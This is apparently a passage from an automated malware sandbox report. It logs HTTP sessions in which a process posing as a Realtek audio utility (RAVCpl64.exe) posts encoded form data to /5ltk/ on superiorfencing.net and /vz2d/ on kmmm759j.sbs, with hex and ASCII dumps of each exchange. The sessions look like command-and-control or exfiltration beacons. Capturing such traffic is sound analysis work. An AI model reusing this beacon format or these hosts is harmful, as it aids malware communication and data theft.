                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 6f 48 71 53 67 55 59 64 5a 57 44 72 4d 6c 48 65 4d 35 4a 76 6e 6e 71 32 48 50 7a 34 2b 2b 33 49 70 74 56 55 50 79 70 76 39 56 36 4b 48 67 42 76 71 6b 6a 67 52 58 33 4c 76 74 4a 52 42 61 55 4b 53 6d 66 45 33 6c 34 5a 51 4f 57 39 6a 6d 2b 79 43 4d 73 71 66 49 67 72 50 51 35 42 75 63 66 54 38 2b 52 4e 71 42 44 6f 4e 6b 51 67 65 4c 61 76 4b 63 6d 43 7a 47 49 4e 41 36 31 77 35 4f 72 59 55 6b 78 34 56 6d 2f 47 7a 37 62 74 37 75 6f 45 50 43 77 6d 67 61 4f 4c 33 46 37 38 33 79 69 51 72 58 6a 59 76 78 4c 6e 6d 76 73 79 36 55 61 33 68 74 30 79 55 2b 4b 65 57 61 4f 35 4f 59 55 63 32 67 3d 3d
                                                                                                  Data Ascii: 6aonl5x=oHqSgUYdZWDrMlHeM5Jvnnq2HPz4++3IptVUPypv9V6KHgBvqkjgRX3LvtJRBaUKSmfE3l4ZQOW9jm+yCMsqfIgrPQ5BucfT8+RNqBDoNkQgeLavKcmCzGINA61w5OrYUkx4Vm/Gz7bt7uoEPCwmgaOL3F783yiQrXjYvxLnmvsy6Ua3ht0yU+KeWaO5OYUc2g==
                                                                                                  Dec 3, 2024 09:49:21.514264107 CET479INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:49:21 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 315
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  26192.168.11.3049890103.230.159.86805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:49:24.042565107 CET713OUTPOST /5ltk/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.superiorfencing.net
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.superiorfencing.net
                                                                                                  Referer: http://www.superiorfencing.net/5ltk/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 6f 48 71 53 67 55 59 64 5a 57 44 72 4f 42 44 65 41 36 68 76 32 58 71 78 43 50 7a 34 73 2b 33 4d 70 74 70 55 50 7a 64 42 36 6a 53 4b 47 45 52 76 70 6c 6a 67 53 58 33 4c 6c 4e 49 62 4d 36 55 33 53 6d 53 35 33 67 59 5a 51 4f 79 39 6a 6b 6d 79 43 64 73 6c 65 59 67 70 57 67 35 44 68 38 66 54 38 2b 52 4e 71 43 2f 4f 4e 6b 59 67 65 61 71 76 49 2b 65 46 36 6d 49 4f 55 71 31 77 75 65 71 52 55 6b 77 43 56 69 2b 52 7a 35 54 74 37 71 34 45 50 54 77 6c 35 71 4f 4e 70 31 36 64 34 54 50 75 6a 6b 66 31 6a 51 62 2b 6d 61 67 57 79 6a 33 74 38 75 41 77 48 65 32 7a 4b 62 6a 52 4d 61 56 48 72 69 70 73 55 2f 5a 33 79 72 72 31 38 6b 4a 6b 54 55 39 6c 6c 74 4d 3d
                                                                                                  Data Ascii: 6aonl5x=oHqSgUYdZWDrOBDeA6hv2XqxCPz4s+3MptpUPzdB6jSKGERvpljgSX3LlNIbM6U3SmS53gYZQOy9jkmyCdsleYgpWg5Dh8fT8+RNqC/ONkYgeaqvI+eF6mIOUq1wueqRUkwCVi+Rz5Tt7q4EPTwl5qONp16d4TPujkf1jQb+magWyj3t8uAwHe2zKbjRMaVHripsU/Z3yrr18kJkTU9lltM=
                                                                                                  Dec 3, 2024 09:49:24.361619949 CET479INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:49:24 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 315
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  27192.168.11.3049891103.230.159.86805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:49:26.881542921 CET1289OUTPOST /5ltk/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.superiorfencing.net
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.superiorfencing.net
                                                                                                  Referer: http://www.superiorfencing.net/5ltk/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 6f 48 71 53 67 55 59 64 5a 57 44 72 4f 42 44 65 41 36 68 76 32 58 71 78 43 50 7a 34 73 2b 33 4d 70 74 70 55 50 7a 64 42 36 6a 61 4b 47 32 5a 76 7a 43 66 67 54 58 33 4c 70 74 49 59 4d 36 55 6d 53 6d 4b 39 33 67 55 6a 51 4d 36 39 78 78 36 79 57 2f 55 6c 55 59 67 70 4c 51 35 43 75 63 66 47 38 2b 42 7a 71 43 76 4f 4e 6b 59 67 65 5a 79 76 50 73 6d 46 34 6d 49 4e 41 36 31 38 35 4f 72 30 55 6e 41 34 56 69 72 73 7a 37 44 74 36 63 67 45 50 68 59 6c 35 71 4f 4e 39 6c 36 63 34 54 44 76 6a 6b 47 73 6a 52 44 75 6d 75 51 57 33 69 57 71 6a 50 77 31 63 66 57 66 4c 36 48 75 43 34 46 55 6b 68 78 37 61 76 5a 36 39 4a 4f 64 36 43 4e 2b 47 58 6c 50 77 5a 74 4b 69 41 4a 46 4b 65 4d 37 74 37 54 49 4c 52 78 31 42 4e 6c 66 35 4f 46 38 31 48 30 52 41 74 35 54 2b 73 64 6d 4b 47 39 76 44 30 32 47 42 41 6c 5a 61 72 4d 45 48 46 6c 74 30 67 4d 4d 65 53 7a 76 4e 4f 78 6d 41 48 34 69 55 58 49 79 38 4e 4c 68 63 33 34 70 38 34 4e 56 66 76 75 42 6c 72 62 2f 4a 54 33 46 5a 44 76 6b 48 4a 78 72 39 74 52 55 51 5a [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=oHqSgUYdZWDrOBDeA6hv2XqxCPz4s+3MptpUPzdB6jaKG2ZvzCfgTX3LptIYM6UmSmK93gUjQM69xx6yW/UlUYgpLQ5CucfG8+BzqCvONkYgeZyvPsmF4mINA6185Or0UnA4Virsz7Dt6cgEPhYl5qON9l6c4TDvjkGsjRDumuQW3iWqjPw1cfWfL6HuC4FUkhx7avZ69JOd6CN+GXlPwZtKiAJFKeM7t7TILRx1BNlf5OF81H0RAt5T+sdmKG9vD02GBAlZarMEHFlt0gMMeSzvNOxmAH4iUXIy8NLhc34p84NVfvuBlrb/JT3FZDvkHJxr9tRUQZkIFOISqf1g7BJzsw9HANvKlY0j5apqyAlO2jkY5HUscuXGmHgohCBiT1RA/bqA7vz3zuJQptf/w2jiVp9qm7x9TlctA1np9Q5ocN/CnRKr7PAa+wLgmfrtYj5bm3n+RuLyKIz6RxyAh8CSQWViMtS9zDhhVOkPcT1vtnsdRBHrieqb6cGCFlV+vtKQCk0cXKOvnpVRPRq/PtVoj6L25xV8qSKVNdZCKKph1dwT5xc7N62d9rgFKmhXDqJq1yc6LMk3IP1d+YM4oKuLJFOJX0yx1uVWM2hNxf9dCVNBh1d1Ae32aRR8QoGTXCsxeS47umDfYmWwqn63Rxfgo/4M0HSK4j6ygnYrAO8nz6VrKlKYyFJb5VkTQIk3uTYjsGAQU+M0+NXME+HiTBMSO6vE+QkeWzepMPK8dyRMI+aSP7TfxtOqI4hEhKCIvvzqmJ0gkbqqF/HW9nrtT9j
                                                                                                  Dec 3, 2024 09:49:26.881594896 CET2541OUTData Raw: 68 69 78 45 6b 36 53 55 56 61 48 32 30 34 55 52 48 73 66 6a 6e 61 61 47 30 65 70 4a 6c 30 4b 4f 4d 78 35 2f 53 33 75 55 45 49 32 67 47 32 5a 39 78 4f 51 31 69 50 70 39 4f 67 67 63 69 52 32 6d 4a 2b 35 61 78 38 70 49 52 45 30 48 56 78 6b 74 39 53
                                                                                                  Data Ascii: hixEk6SUVaH204URHsfjnaaG0epJl0KOMx5/S3uUEI2gG2Z9xOQ1iPp9OggciR2mJ+5ax8pIRE0HVxkt9SLvH/fRlB15WevcLLK/fHCAfr3bVsba/Vaz++k2i79BghcSgi9uh3HYtlaM0BlqiSDgSX8Wj1mU1q5vGAuTlCcB6p1gueVBboL08OM9rPsQ+5NW+2knQEpNIz34WCaOo4EHso+C5LUIL39SNcL7QsgBTSjqpl5FNTF
                                                                                                  Dec 3, 2024 09:49:27.197330952 CET479INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:49:27 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 315
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  28192.168.11.3049892103.230.159.86805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:49:29.720982075 CET420OUTGET /5ltk/?6aonl5x=lFCyjgUgRWTJD3PvHrx0okuLDoXTkt/loKBcMldX7EHyWmdK0Vf5T1rkkoFAHq8jWgOppi08ScKStlrsdMkFXoBVPkBmvOuk6JZ8uBPhbCVyIuKgJdug7RU=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.superiorfencing.net
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:49:30.034149885 CET479INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:49:29 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 315
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  29192.168.11.304989343.156.176.253805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:49:35.523061991 CET672OUTPOST /vz2d/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.kmmm759j.sbs
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.kmmm759j.sbs
                                                                                                  Referer: http://www.kmmm759j.sbs/vz2d/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 38 6c 47 67 7a 66 39 54 77 6c 38 77 75 57 33 57 64 64 2f 39 6a 76 62 4c 43 6f 44 6d 75 42 48 50 35 30 42 4c 6a 66 42 52 72 45 46 49 73 7a 2f 4d 57 32 51 4b 56 6a 4e 31 57 41 6e 72 79 76 63 73 6d 6d 6f 31 47 44 43 6f 59 68 44 76 37 4b 64 6a 39 73 41 4d 30 43 37 2b 7a 6a 66 6d 63 2b 37 59 66 46 61 5a 47 79 4e 55 66 65 69 4a 6f 30 77 41 59 67 45 4d 37 44 47 69 62 31 72 44 72 54 33 49 69 76 31 36 31 68 77 4d 53 70 38 30 52 4b 4a 57 44 50 56 44 59 4f 42 52 48 46 36 37 4b 61 37 70 36 34 5a 6a 66 49 6c 45 50 44 6e 33 43 5a 71 4a 66 56 69 2f 49 32 6c 6c 42 74 45 5a 6e 78 49 72 45 67 3d 3d
                                                                                                  Data Ascii: 6aonl5x=8lGgzf9Twl8wuW3Wdd/9jvbLCoDmuBHP50BLjfBRrEFIsz/MW2QKVjN1WAnryvcsmmo1GDCoYhDv7Kdj9sAM0C7+zjfmc+7YfFaZGyNUfeiJo0wAYgEM7DGib1rDrT3Iiv161hwMSp80RKJWDPVDYOBRHF67Ka7p64ZjfIlEPDn3CZqJfVi/I2llBtEZnxIrEg==
                                                                                                  Dec 3, 2024 09:49:35.869956017 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Server: Tengine
                                                                                                  Date: Tue, 03 Dec 2024 08:49:35 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Content-Length: 58296
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  ETag: "67403337-e3b8"
                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                  Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                  Dec 3, 2024 09:49:35.870021105 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                                  Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                                  Dec 3, 2024 09:49:35.870069027 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                                  Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
                                                                                                  Dec 3, 2024 09:49:35.870083094 CET1289INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
                                                                                                  Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                                  Dec 3, 2024 09:49:35.870094061 CET1289INData Raw: 79 49 4e 51 42 68 35 62 67 30 41 31 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58
                                                                                                  Data Ascii: yINQBh5bg0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP
                                                                                                  Dec 3, 2024 09:49:35.870105982 CET1289INData Raw: 49 51 41 78 41 48 59 43 75 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52
                                                                                                  Data Ascii: IQAxAHYCuDip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2/
                                                                                                  Dec 3, 2024 09:49:35.870136976 CET475INData Raw: 65 50 52 47 4b 74 4d 2b 4f 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78
                                                                                                  Data Ascii: ePRGKtM+OrS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+Pr
                                                                                                  Dec 3, 2024 09:49:35.870203972 CET1289INData Raw: 7a 65 74 51 73 31 79 4c 74 78 5a 73 55 71 46 47 2b 62 31 51 71 32 52 6e 52 62 67 4a 4c 59 58 68 75 76 6c 74 38 42 51 4f 77 41 69 35 70 4a 72 44 46 43 66 53 66 51 6b 42 35 6b 79 4c 61 57 6a 4d 2f 47 39 37 48 39 73 65 32 31 46 69 30 6a 57 35 66 31
                                                                                                  Data Ascii: zetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee
